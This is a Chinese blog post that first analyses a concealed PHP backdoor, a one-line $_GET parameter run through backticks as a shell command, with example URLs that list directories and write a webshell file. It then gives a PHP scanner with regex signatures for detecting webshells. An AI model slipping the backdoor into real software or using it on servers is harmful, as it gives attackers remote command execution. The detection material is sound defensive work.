一个不易被发现的PHP后门代码解析

偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。

伪装性很好,很容易被管理员忽略。

$selfNums = $_GET['r'];if (isset($selfNums)){  echo `$selfNums`;}

刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的),

通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://127.0.0.1/t.php?r=dir 可以列出目录

http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\webhackCN.php

转自:http://blog.webhack.cn/biancheng/110.html

完美扫描PHP特殊一句话后门代码

<?php
/**********************
作者 Spider
网上公布的各种PHP后门全军覆没针对一些特殊变形的后门需要自己添加特征误报率不到百分之一
**********************/

error_reporting(E_ERROR);
ini_set('max_execution_time',20000);
ini_set('memory_limit','512M');
header("content-Type: text/html; 
charset=gb2312"); 
$matches = array(        
'/function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|system|passthru)+[\'|\"]\s*\)/i',       
'/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*\)/i',        
'/((udp|tcp)\:\/\/(.*)\;)+/i',        
'/preg\_replace\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i',        
'/preg\_replace\s*\((.*)\(base64\_decode\(\$/i',        
'/(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*(base64\_decode|str\_rot13|gz(\w+)|file\_(\w+)\_contents|(.*)php\:\/\/input)+/i',        
'/(eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk)+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i',        '/eval\s*\(\s*\(\s*\$\$(\w+)/i',        '/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+)\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js)+[\'|\"]\s*\)/i',        
'/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*\$(\w+)\s*\)/i',       
'/\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES)+\[(.*)\]\[(.*)\]\s*\)/i',        
'/(fopen|fwrite|fputs|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\](.*)\)/i',       
'/echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\)/i',        
'/new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\)/i',       
'/\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i',        
'/\$\_\=(.*)\$\_/i',       
'/\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\(\s*\$(.*)\)/i',        
'/\$(\w+)\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\s*\)/i',        
'/\$(\w+)\s*\(\s*\$\{(.*)\}/i',        
'/\$(\w+)\s*\(\s*chr\(\d+\)/i');
function antivirus($dir,$exs,$matches) {       
if(($handle = @opendir($dir)) == NULL) return false;       
while(false !== ($name = readdir($handle))) {                
if($name == '.' || $name == '..') continue;                
$path = $dir.$name;               
if(is_dir($path)) {                        
//chmod($path,0777);
/*主要针对一些0111的目录*/                        
if(is_readable($path)) antivirus($path.'/',$exs,$matches);               
} elseif(strpos($name,';') > -1 || strpos($name,'%00') > -1 || strpos($name,'/') > -1) {
echo '特征 <input type="text" style="width:218px;" value="解析漏洞"> '.$path.'<div></div>'; 
flush(); ob_flush();                } 
else {                       
if(!preg_match($exs,$name)) continue;                        
if(filesize($path) > 10000000) continue;                        
$fp = fopen($path,'r');                        
$code = fread($fp,filesize($path));                        
fclose($fp);                        
if(empty($code)) continue;                        
foreach($matches as $matche) {                                
$array = array();                                
preg_match($matche,$code,$array);                               
if(!$array) 
continue;                                
if(strpos($array[0],"\x24\x74\x68\x69\x73\x2d\x3e")) continue;                                
$len = strlen($array[0]);                               
if($len > 6 && $len < 200) {                                        
echo '特征 <input type="text" style="width:218px;" value="'.htmlspecialchars($array[0]).'"> '.$path.'<div></div>'; 
flush(); 
ob_flush(); 
break;                               
}                       
}                       
unset($code,$array);               
}        
}        
closedir($handle);        
return true;
} 
function strdir($str) { 
return str_replace(array('\\','//','//'),
array('/','/','/'),chop($str)); 
} 
echo '<form method="POST">';
echo '路径: <input type="text" name="dir" value="'.($_POST['dir'] ? strdir($_POST['dir'].'/') : strdir($_SERVER['DOCUMENT_ROOT'].'/')).'" style="width:398px;"><div></div>';
echo '后缀: <input type="text" name="exs" value="'.($_POST['exs'] ? $_POST['exs'] : '.php|.inc|.phtml').'" style="width:398px;"><div></div>';
echo '操作: <input type="submit" style="width:80px;" value="scan"><div></div>';
echo '</form>'; 
if(file_exists($_POST['dir']) && $_POST['exs']) {        
$dir = strdir($_POST['dir'].'/');        
$exs = '/('.str_replace('.','\\.',$_POST['exs']).')/i';        
echo antivirus($dir,$exs,$matches) ? '<div></div>扫描完毕' : '<div></div>扫描中断';
}
?>

 

作者: admin

发表评论